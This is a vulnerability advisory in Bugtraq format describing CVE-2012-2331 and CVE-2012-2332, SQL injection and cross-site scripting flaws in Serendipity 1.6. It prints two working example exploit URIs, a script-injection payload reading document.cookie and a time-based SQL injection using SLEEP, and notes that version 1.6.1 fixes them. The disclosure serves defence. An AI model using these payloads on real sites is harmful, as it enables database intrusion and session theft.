Serendipity SQL Injection and Cross Site Scripting Vulnerabilities

Bugtraq ID:	53418
Class:	Input Validation Error
CVE:	CVE-2012-2331 CVE-2012-2332
Remote:	Yes
Local:	No
Published:	May 08 2012 12:00AM
Updated:	May 15 2012 11:00PM
Credit:	Stefan Schurtz
Vulnerable:	Serendipity Serendipity 1.6
Not Vulnerable:	Serendipity Serendipity 1.6.1

Serendipity SQL Injection and Cross Site Scripting Vulnerabilities

Attackers can use a browser to exploit the SQL-injection issue. The attacker must trick an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issue.

The following example URIs are available:

Cross Site-Scripting:
http://www.example.com/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]='"</script><script>alert(document.cookie)</script>

SQL-Injection:
http://www.example.com/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[plugin_to_conf]=-1' OR SLEEP(10)=0 LIMIT 1--+

Serendipity SQL Injection and Cross Site Scripting Vulnerabilities

Solution:
Vendor updates are available. Please see the references for more information.

Serendipity SQL Injection and Cross Site Scripting Vulnerabilities

References:

• CVE request: XSS and SQL injection in serendipity before 1.7.1 (Stefan Schurtz)
  
• Serendipity 1.6.1 released (S9y)
  
• Serendipity Homepage (S9Y)
  
• KORAMIS-ADV2012-001: Serendipity 1.6 Backend Cross-Site Scripting and SQL-Inject (Stefan Schurtz)